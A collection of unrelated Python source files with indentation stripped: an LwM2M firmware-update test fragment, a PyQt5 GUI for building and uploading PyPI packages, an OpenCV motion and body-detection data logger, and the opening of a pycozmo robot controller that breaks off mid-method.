self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
class FirmwareUpdateUnconfiguredHttpsTest(FirmwareUpdate.TestWithHttpsServer):
def setUp(self):
super().setUp(pass_cert_to_demo=False)
def runTest(self):
# disable minimum notification period
write_attrs_req = Lwm2mWriteAttributes(ResPath.FirmwareUpdate.UpdateResult,
query=['pmin=0'])
self.serv.send(write_attrs_req)
self.assertMsgEqual(Lwm2mChanged.matching(
write_attrs_req)(), self.serv.recv())
# initial result should be 0
observe_req = Lwm2mObserve(ResPath.FirmwareUpdate.UpdateResult)
self.serv.send(observe_req)
self.assertMsgEqual(Lwm2mContent.matching(
observe_req)(content=b'0'), self.serv.recv())
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
# even before reaching the server, we should get an error
notify_msg = self.serv.recv()
# no security information => "Unsupported protocol"
self.assertMsgEqual(Lwm2mNotify(observe_req.token,
str(UPDATE_RESULT_UNSUPPORTED_PROTOCOL).encode()),
notify_msg)
self.serv.send(Lwm2mReset(msg_id=notify_msg.msg_id))
self.assertEqual(0, self.read_state())
|
application.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QPoint
import sys
import setupsys
import systimatic
from ub import TW
import time
import threading
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(586, 711)
font = QtGui.QFont()
font.setFamily("MS Serif")
font.setPointSize(16)
Form.setFont(font)
Form.setLayoutDirection(QtCore.Qt.RightToLeft)
self.setWindowIcon(QtGui.QIcon('inapp.ico'))
Form.setStyleSheet("background: rgb(0, 0, 0);")
self.browsebox = QtWidgets.QLineEdit(Form)
self.browsebox.setGeometry(QtCore.QRect(30, 190, 441, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.browsebox.setFont(font)
self.browsebox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.browsebox.setInputMask("")
self.browsebox.setText("")
self.browsebox.setObjectName("browsebox")
self.browsebtn = QtWidgets.QPushButton(Form)
self.browsebtn.setGeometry(QtCore.QRect(480, 190, 93, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.browsebtn.setFont(font)
self.browsebtn.setStyleSheet("QPushButton#browsebtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:4px;\n"
"}\n"
"QPushButton#browsebtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#browsebtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.browsebtn.setObjectName("browsebtn")
self.userbox = QtWidgets.QLineEdit(Form)
self.userbox.setGeometry(QtCore.QRect(30, 61, 191, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.userbox.setFont(font)
self.userbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.userbox.setInputMask("")
self.userbox.setMaxLength(32766)
self.userbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.userbox.setObjectName("userbox")
self.passwordbox = QtWidgets.QLineEdit(Form)
self.passwordbox.setGeometry(QtCore.QRect(30, 110, 191, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.passwordbox.setFont(font)
self.passwordbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.passwordbox.setEchoMode(QtWidgets.QLineEdit.Password)
self.passwordbox.setObjectName("passwordbox")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setEnabled(True)
self.textBrowser.setGeometry(QtCore.QRect(20, 400, 551, 231))
font = QtGui.QFont()
font.setFamily("Diwani Simple Striped")
font.setPointSize(11)
self.textBrowser.setFont(font)
self.textBrowser.setStyleSheet("color: #ffffff;")
self.textBrowser.setObjectName("textBrowser")
self.versionbox = QtWidgets.QLineEdit(Form)
self.versionbox.setGeometry(QtCore.QRect(60, 260, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.versionbox.setFont(font)
self.versionbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.versionbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.versionbox.setObjectName("versionbox")
self.builbox = QtWidgets.QLineEdit(Form)
self.builbox.setGeometry(QtCore.QRect(240, 310, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.builbox.setFont(font)
self.builbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.builbox.setText("")
self.builbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.builbox.setObjectName("builbox")
self.buildbtn = QtWidgets.QPushButton(Form)
self.buildbtn.setGeometry(QtCore.QRect(30, 350, 251, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.buildbtn.setFont(font)
self.buildbtn.setStyleSheet("QPushButton#buildbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:6px;\n"
"}\n"
"QPushButton#buildbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#buildbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.buildbtn.setObjectName("buildbtn")
self.uploadbtn = QtWidgets.QPushButton(Form)
self.uploadbtn.setGeometry(QtCore.QRect(300, 350, 251, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.uploadbtn.setFont(font)
self.uploadbtn.setStyleSheet("QPushButton#uploadbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:6px;\n"
"}\n"
"QPushButton#uploadbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#uploadbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.uploadbtn.setObjectName("uploadbtn")
self.builbox_2 = QtWidgets.QLineEdit(Form)
self.builbox_2.setGeometry(QtCore.QRect(60, 310, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.builbox_2.setFont(font)
self.builbox_2.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.builbox_2.setEchoMode(QtWidgets.QLineEdit.Normal)
self.builbox_2.setObjectName("builbox_2")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(60, 240, 131, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label.setFont(font)
self.label.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(240, 290, 111, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_2.setFont(font)
self.label_2.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(60, 290, 111, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_3.setFont(font)
self.label_3.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(30, 36, 171, 20))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_4.setFont(font)
self.label_4.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(Form)
self.label_5.setGeometry(QtCore.QRect(30, 90, 171, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_5.setFont(font)
self.label_5.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(Form)
self.label_6.setGeometry(QtCore.QRect(30, 160, 161, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_6.setFont(font)
self.label_6.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 17px;")
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(Form)
self.label_7.setGeometry(QtCore.QRect(240, 240, 171, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_7.setFont(font)
self.label_7.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 15px;")
self.label_7.setScaledContents(True)
self.label_7.setObjectName("label_7")
self.pyversionbox = QtWidgets.QLineEdit(Form)
self.pyversionbox.setGeometry(QtCore.QRect(240, 260, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.pyversionbox.setFont(font)
self.pyversionbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.pyversionbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.pyversionbox.setObjectName("pyversionbox")
self.undertextbtn = QtWidgets.QPushButton(Form)
self.undertextbtn.setGeometry(QtCore.QRect(60, 650, 461, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.undertextbtn.setFont(font)
self.undertextbtn.setStyleSheet("QPushButton#undertextbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius: 15px;\n"
"}\n"
"QPushButton#undertextbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#undertextbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.undertextbtn.setObjectName("undertextbtn")
self.signedbox = QtWidgets.QCheckBox(Form)
self.signedbox.setEnabled(True)
self.signedbox.setGeometry(QtCore.QRect(230, 100, 111, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.signedbox.setFont(font)
self.signedbox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.signedbox.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 13px;")
self.signedbox.setChecked(True)
self.signedbox.setObjectName("signedbox")
self.fillbox = QtWidgets.QCheckBox(Form)
self.fillbox.setGeometry(QtCore.QRect(420, 250, 121, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.fillbox.setFont(font)
self.fillbox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.fillbox.setStyleSheet("color:rgba(255,255,255,0.5);\n"
"font-family: Courier New;\n"
"font-size: 17px;\n"
"border-radius:8px;")
self.fillbox.setChecked(True)
self.fillbox.setObjectName("fillbox")
self.versionupdate = QtWidgets.QCheckBox(Form)
self.versionupdate.setGeometry(QtCore.QRect(420, 300, 101, 31))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.versionupdate.sizePolicy().hasHeightForWidth())
self.versionupdate.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.versionupdate.setFont(font)
self.versionupdate.setLayoutDirection(QtCore.Qt.LeftToRight)
self.versionupdate.setStyleSheet("color:rgba(255,255,255,0.5);\n"
"font-family: Courier New;\n"
"font-size: 21px;\n"
"border-size: 0px;\n"
"")
self.versionupdate.setChecked(True)
self.versionupdate.setTristate(False)
self.versionupdate.setObjectName("versionupdate")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.browsebtn.setText(_translate("Form", "Browse"))
self.userbox.setText(_translate("Form", "username"))
self.passwordbox.setText(_translate("Form", "password"))
self.textBrowser.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Diwani Simple Striped\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'MS Shell Dlg 2\'; font-size:7.8pt;\"><br /></p></body></html>"))
self.versionbox.setText(_translate("Form", "0.0.0"))
self.buildbtn.setText(_translate("Form", "Build"))
self.uploadbtn.setText(_translate("Form", "Upload"))
self.builbox_2.setText(_translate("Form", "dist/*"))
self.label.setText(_translate("Form", "Version (NR)"))
self.label_2.setText(_translate("Form", "build (NR)"))
self.label_3.setText(_translate("Form", "dist (NR)"))
self.label_4.setText(_translate("Form", "pypi username (R)"))
self.label_5.setText(_translate("Form", "pypi password (R)"))
self.label_6.setText(_translate("Form", "Folder path (R)"))
self.label_7.setText(_translate("Form", "Python Version (NR)"))
self.pyversionbox.setText(_translate("Form", "0.0"))
self.undertextbtn.setText(_translate("Form", "Open folder"))
self.signedbox.setText(_translate("Form", "Stay signed"))
self.fillbox.setText(_translate("Form", "Auto fill"))
self.versionupdate.setText(_translate("Form", "AVU"))
class fuck_this_dumb_bug:
def __init__(self):
self.tw = TW()
class Form(QtWidgets.QWidget, Ui_Form):
def __init__(self, *args, **kwargs):
QtWidgets.QWidget.__init__(self, *args, **kwargs)
self.setupUi(self)
self.signedbox.setChecked(False)
self.buildbtn.clicked.connect(self.builed)
self.activestate()
self.setWindowTitle("Lib control")
self.undertextbtn.clicked.connect(self.openfolder)
self.pyversionbox.setEnabled(False)
self.uploadbtn.clicked.connect(self.upload)
self.builbox.setEnabled(False)
self.browsebtn.clicked.connect(self.getfolder)
self.pyversionbox.setText(systimatic.getpy())
self.textBrowser.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 14px;")
def openfolder(self):
return systimatic.openfolder(self.browsebox.text())
def upload(self):
def fthread():
self.undertextbtn.setText("working..")
self.disableallbtns()
records, status = TW().upload(self.browsebox.text(), self.userbox.text(), self.passwordbox.text(), self.builbox_2.text())
self.recordsloop(records)
self.enableallbtns()
self.default_status()
threading.Thread(target=fthread).start()
self.enableallbtns()
def getfolder(self):
self.browsebox.setText(systimatic.getfolder())
threading.Thread(target=self.versionloop, daemon=True).start()
return
def activestate(self):
def fthread():
while True:
if self.signedbox.checkState() == 2:
try:
if self.userbox.text() != "username" and self.passwordbox.text() != "password":
systimatic.writelog(self.userbox.text(), self.passwordbox.text())
else:
username, password = systimatic.getlogdata(
username=self.userbox.text(),
password=self.passwordbox.text())
self.userbox.setText(username)
self.passwordbox.setText(password)
except:
pass
time.sleep(1)
threading.Thread(target=fthread, daemon=True).start()
def builed(self):
def fthread():
self.undertextbtn.setText("working..")
self.disableallbtns()
self.textBrowser.append("Running builed function.")
records, result = TW().builed(self.browsebox.text(),
)
self.recordsloop(records)
self.enableallbtns()
self.default_status()
threading.Thread(target=fthread, daemon=True).start()
def recordsloop(self, records):
for rec in records:
try:
self.textBrowser.append(rec)
except:
pass
def change_status(self, status):
return self.undertextbtn.setText(status)
def default_status(self, status='Open Folder'):
return self.undertextbtn.setText(status)
def disableallbtns(self):
self.browsebtn.setEnabled(False)
self.buildbtn.setEnabled(False)
self.uploadbtn.setEnabled(False)
self.undertextbtn.setEnabled(False)
def versionloop(self):
def loop(old_version):
while True:
current_version = self.versionbox.text()
if old_version != current_version.replace(" ", ""):
self.textBrowser.append(f"updated version: {current_version}")
setupsys.setversion(self.browsebox.text(), current_version)
print("break")
break
time.sleep(1)
while True:
if self.fillbox.checkState() == 2:
old_version = setupsys.getversion(self.browsebox.text())
self.versionbox.setText(old_version)
self.textBrowser.append(f"current version: {old_version}")
loop(old_version)
def enableallbtns(self):
self.browsebtn.setEnabled(True)
self.buildbtn.setEnabled(True)
self.uploadbtn.setEnabled(True)
self.undertextbtn.setEnabled(True)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
w = Form()
w.show()
sys.exit(app.exec_())
|
data_collect_haar.py
|
#!/usr/bin/env python3
# coding=utf-8
import cv2
import numpy as np
import csv
import time
from multiprocessing import Process
# 在中断后重新识别人脸会导致突然的速度变化,因为是和之前的有图速度进行运算
# 两边判断现在基本不起作用
class DataCollect(object):
def __init__(self, cam_id, video_name):
self.cam_id = cam_id
self.video_name = video_name
self.row = []
def _judge_move(self, cur_frame_inner, pre_frame_inner):
# gray_img = cv2.cvtColor(cur_frame_inner, cv2.COLOR_BGR2GRAY)
gray_img = cur_frame_inner
gray_img = cv2.resize(gray_img, (500, 500)) # 此条不知是否影响判断
gray_img = cv2.GaussianBlur(gray_img, (21, 21), 0)
if pre_frame_inner is None:
pre_frame_inner = gray_img
return pre_frame_inner
else:
img_delta = cv2.absdiff(pre_frame_inner, gray_img)
thresh = cv2.threshold(img_delta, 25, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=2)
# image, contours, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
image, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
if cv2.contourArea(c) < 500: # 设置敏感度
continue
else:
# print(cv2.contourArea(c))
# print("画面中有运动物体")
self.row.pop()
self.row.append('1')
break
pre_frame_inner = gray_img
return pre_frame_inner
def _entropy(self, band): # 计算画面熵
hist, _ = np.histogram(band, bins=range(0, 256))
hist = hist[hist > 0]
return -np.log2(hist / hist.sum()).sum()
def _process_rgb_delta(self, cur_frame_inner, entropy_last_inner): # 计算熵抖动
# b, g, r = cv2.split(cur_frame_inner)
# rgb_average = (self._entropy(r) + self._entropy(g) + self._entropy(b)) / 3
gray_average = self._entropy(cur_frame_inner)
if entropy_last_inner == 0:
self.row.append(0)
return gray_average
jitter = abs(gray_average - entropy_last_inner)
jitter = int(jitter)
# print("画面抖动数值:", jitter)
self.row.append(jitter)
return gray_average
def _cal_speed_location(self, cur_frame_inner, point_x_inner, point_y_inner,
smooth_times, speed_x, speed_y):
# cur_frame_inner = cv2.cvtColor(cur_frame_inner, cv2.COLOR_BGR2GRAY)
bodycascade = cv2.CascadeClassifier("haarcascade_upperbody.xml")
bodys = bodycascade.detectMultiScale(
cur_frame_inner,
scaleFactor=1.08, # 越小越慢,越可能检测到
minNeighbors=2, # 越小越慢,越可能检测到
minSize=(95, 80),
maxSize=(150, 180),
# minSize=(30, 30)
flags=cv2.CASCADE_SCALE_IMAGE
)
if len(bodys) == 0: # 没有人脸,速度和摄像头都为0
if point_x_inner == 0 and point_y_inner == 0: # 未出现过
self.row.append(0) # 一个自身判断无运动
self.row.append(0) # 两个速度
self.row.append(0)
self.row.append(0) # 左右
self.row.append(0)
# 加入平滑
else: # 之前帧已经出现过点,进行平滑
if smooth_times >= 0:
self.row.append(1) # 自身判断有运动
self.row.append(speed_x)
self.row.append(speed_y)
self.row.append(0) # 左右
self.row.append(0)
smooth_times -= 1
point_x_inner += speed_x
point_y_inner += speed_y
x, y, w, h = point_x_inner+speed_x, point_y_inner+speed_y, 150, 120
p1 = (x, y)
p2 = (x + w, y + h)
cv2.rectangle(cur_frame_inner, p1, p2, (0, 255, 0), 2)
else: # 已经平滑过5帧不再平滑
self.row.append(0) # 一个自身判断无运动
self.row.append(0) # 两个速度
self.row.append(0)
self.row.append(0) # 左右
self.row.append(0)
else:
smooth_times = -1 # 有识别,将平滑置为5, 若置为-1,不会使用平滑
self.row.append(1) # 自身判断有运动
# 只输入第一张人脸数据
print('Now face:', bodys)
x, y, w, h = bodys[0][0], bodys[0][1], bodys[0][2], bodys[0][3]
p1 = (x, y)
p2 = (x + w, y + h)
cv2.rectangle(cur_frame_inner, p1, p2, (0, 255, 0), 2)
if point_x_inner == 0 and point_y_inner == 0: # 刚标记后第一帧
# 两个速度为0
self.row.append(0)
self.row.append(0)
else:
v_updown = point_y_inner - p1[1]
v_leftright = p1[0] - point_x_inner
# print("横轴速度为:", v_leftright)
# print("纵轴速度为:", v_updown)
self.row.append(v_leftright)
self.row.append(v_updown)
speed_x = v_leftright
speed_y = v_updown
point_x_inner = p1[0]
point_y_inner = p1[1]
if p1[0] <= 50:
if p1[0] < 0:
self.row.append(50)
else:
self.row.append(50 - p1[0])
print("左边该开了", 50 - p1[0])
else:
self.row.append(0)
if p2[0] >= 590:
if p2[0] > 640:
self.row.append(50)
else:
self.row.append(p2[0] - 590)
print("右边该开了", p2[0] - 590)
else:
self.row.append(0)
return point_x_inner, point_y_inner, smooth_times, speed_x, speed_y
def data_collect(self):
# 全局变量
timecount_start = time.time()
time_stamp = 1 # 时间标记
pre_frame = None # 获取参数一:前一帧图像(灰度),判断是否有运动物体
entropy_last = 0 # 获取参数二:前一帧抖动数值
point_x, point_y = 0, 0 # 获取参数三:初始化运动点
smooth = 0 # 设置平滑的帧数
speed_x_last, speed_y_last = 0, 0 # 前一阵速度,用于平滑
camera = cv2.VideoCapture(self.video_name) # self.video_name
self.row = []
# file_name = str(datetime.datetime.now().strftime("%Y-%m-%d %H-%M-%S") + '_' + str(self.cam_id))
file_name = self.video_name[-25:-4]
with open('data/data_' + file_name + '.csv', 'w', newline='') as file: # newline不多空行
f = csv.writer(file)
# 循环获取参数
while True:
res, cur_frame = camera.read()
if res is not True:
break
cur_frame = cv2.cvtColor(cur_frame, cv2.COLOR_BGR2GRAY) # 转变至Gray
if cv2.waitKey(1) & 0xFF == 27:
break
# 参数0:时间(暂时加入时间帧)
# time_now = str(datetime.datetime.now().strftime("%H%M%S%f"))
# row.append(time_now[:-4]) # 毫秒只取两位
self.row.append(time_stamp)
time_stamp += 1
print('------', time_stamp, '-------')
# 获取参数一:开/关
self.row.append('0') # 判断有无运动,遇到有物体运动再改为1
pre_frame = self._judge_move(cur_frame, pre_frame)
# 获取参数二:图像抖动
entropy_last = self._process_rgb_delta(cur_frame, entropy_last)
# 获取参数三:速度和对应摄像头开关
point_x, point_y, smooth, speed_x_last, speed_y_last = self._cal_speed_location(cur_frame,
point_x,
point_y,
smooth,
speed_x_last,
speed_y_last)
# 写入一行
print(self.row)
f.writerow(self.row)
self.row = []
cv2.imshow(str(self.cam_id), cur_frame)
# 计算总用时,释放内存
timecount_end = time.time()
print(self.cam_id, " time:", timecount_end - timecount_start)
camera.release()
def start_collect(cam_id, video_name):
DataCollect(cam_id, video_name).data_collect()
if __name__ == "__main__":
global_start = time.time()
list_video_name = ["video/2cam_scene1/2017-08-07 18-00-50_0.avi"]
for i, name in enumerate(list_video_name):
p = Process(target=start_collect, args=(i, name))
p.start()
cv2.destroyAllWindows()
global_end = time.time()
print("global time:", global_end - global_start)
|
pycozmobot.py
|
import pycozmo
from pycozmo import Client, LiftPosition
from pycozmo.util import Pose, Vector3, Angle, Distance, Speed #, Rotation
import time
import threading
import math
from pycozmo.expressions import Amazement, Excitement, Happiness, Sadness, Anger, Boredom, Surprise
import quaternion
import io
import json
animations = {
"GREETING": "anim_greeting_happy_01",
"SNEEZE": "anim_petdetection_shortreaction_01",
"WHAT": "anim_vc_reaction_whatwasthat_01",
"WIN": "anim_majorwin",
"LOSE": "anim_majorfail",
"FACEPALM": "anim_hiccup_faceplant_01",
"BEEPING": "anim_explorer_drvback_loop_01",
"NEW_OBJECT": "anim_launch_cubediscovery",
"LOST_SOMETHING": "anim_energy_cubenotfound_01",
"REJECT": "anim_cozmosays_badword_01",
"FAILED": "anim_majorfail",
"EXCITED_GREETING": "anim_meetcozmo_celebration",
"TALKY_GREETING": "anim_greeting_happy_01"
}
emotions = {
"AMAZED": Amazement,
"PLEASED": Happiness,
"HAPPY": Excitement,
"UPSET": Sadness,
"ANGRY": Anger,
"BORED": Boredom,
"STARTLED": Surprise
}
class Cube:
def __init__(self, object_id):
self.object_id = object_id
self.is_visible = False
self.pose = Pose(0, 0, 0, angle_z=Angle(radians=0))
class CozmoWorld:
def __init__(self, cli):
self.light_cubes = {
1: Cube('1?'),
2: Cube('2?'),
3: Cube('3?')
}
available_objects = dict(cli.available_objects)
found_cubes = 0
for factory_id, obj in available_objects.items():
dir(obj)
if obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE1:
self.light_cubes[1] = Cube(obj.factory_id)
found_cubes += 1
elif obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE2:
self.light_cubes[2] = Cube(obj.factory_id)
found_cubes += 1
elif obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE3:
self.light_cubes[3] = Cube(obj.factory_id)
found_cubes += 1
else:
continue
dir(obj)
if found_cubes >= 3:
break
def custom_dir(c, add): return dir(type(c)) + list(c.__dict__.keys()) + add
class GetAttr:
"""Base class for attr accesses in `self._xtra` passed down to `self.default`"""
@property
def _xtra(self): return [o for o in dir(self.default) if not o.startswith('_')]
def __getattr__(self, k):
if k in self._xtra: return getattr(self.default, k)
raise AttributeError(k)
def __dir__(self): return custom_dir(self, self._xtra)
class RobotWithWorld(GetAttr):
def __init__(self, cli):
self.default = cli
self.world = CozmoWorld(cli)
#
# def __getattr__(self, name):
# return getattr(self.cli, name)
# raise AttributeError
# @property
# def pose(self):
# return self.default.pose
# def set_head_angle(self, angle: float, accel: float = 10.0, max_speed: float = 10.0, duration: float = 0.0):
# self.default.set_head_angle(angle, float, accel, max_speed, duration)
# def wrapper(*args, **kwargs):
# for delegate_object_str, delegated_methods in delegation_config.items():
# if called_method in delegated_methods:
# break
# else:
# __raise_standard_error()
#
# delegate_object = getattr(self, delegate_object_str, None)
#
# return getattr(delegate_object, called_method)(*args, **kwargs)
# return wrapper
class CozmoBot:
def __init__(self, aruco):
self._robot = None
self._origin = None
self._dataPubThread = None
self._camClient = None
self._wsClient = None
self._latest_image = None
self._aruco = aruco
def start(self, code):
from ws4py.client.threadedclient import WebSocketClient
self._camClient = WebSocketClient('ws://localhost:9090/camPub')
self._camClient.connect()
self._wsClient = WebSocketClient('ws://localhost:9090/WsPub')
self._wsClient.connect()
self._dataPubThread = threading.Thread(target=self.feedRobotDataInThread)
self._dataPubThread.daemon = True
self._dataPubThread.start()
# pycozmo.robot.Robot.drive_off_charger_on_connect = False
with pycozmo.connect(enable_procedural_face=False) as cli:
print('connected:')
# self._robot = cli
self._robot = RobotWithWorld(cli)
self._origin = self._robot.pose
# self.cubes_to_numbers = {}
# for key in self._robot.world.light_cubes:
# self.cubes_to_numbers[self._robot.world.light_cubes.get(key).object_id] = key
# self.resetCubes()
# self.resetCustomObjects()
self._latest_image = None
# print(self)
cli.add_handler(pycozmo.event.EvtNewRawCameraImage, self.on_camera_image)
cli.enable_camera(enable=True, color=True)
cli.load_anims()
bot = self
# import pycozmo
